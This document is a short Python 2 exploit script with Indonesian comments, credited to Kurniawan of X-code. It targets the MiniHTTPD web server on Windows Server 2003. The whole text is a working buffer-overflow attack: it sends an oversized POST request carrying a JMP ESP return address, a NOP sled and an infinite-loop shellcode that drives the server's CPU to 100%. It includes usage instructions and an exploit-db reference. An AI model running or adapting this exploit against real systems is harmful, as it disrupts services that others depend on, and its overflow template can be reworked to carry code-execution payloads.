Exploit Web Server Mini HTTPD agar CPU bekerja 100% yang dibuat oleh Kurniawan untuk Windows Server
#!/usr/bin/python
import socket
import sys
if len(sys.argv) != 3:
print "Exploit MiniHTTPD untuk membuat CPU Windows 2003 Server bekerja 100%"
print "Oleh Kurniawan. [email protected]. xcode.or.id."
print "Cara penggunaan : ./minihttpd.py <ip target> <port>"
sys.exit(1)
ipaddress = sys.argv[1]
port = int(sys.argv[2])
buffer = "A" * 5438
eip = "\x38\x07\xD2\x77" #JMP ESP, user32.dll
nop = "\x90" * 36
#Source code assembly shellcode buatan Mr.Ne0z, staff X-code ( xcode.or.id/community ), https://github.com/ne0z
#BITS 32
#global _start
#_start:
#xor eax, eax
#inc eax
#dec eax
#jmp _start
shellcode = ("\x31\xc0\x40\x48\xeb\xfa")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(ipaddress),(port)))
#Bug Reference : https://www.exploit-db.com/exploits/26739
buf = "POST / %s HTTP/1.1\r\nHost:(str(ipaddress)\r\n\r\n" % (buffer+eip+nop+shellcode)
s.send(buf)
s.close()
Exploit ini bisa diakses di https://github.com/kurniawandata/exploitminihttpdforwinserver
Oleh Kurniawan
Founder X-code
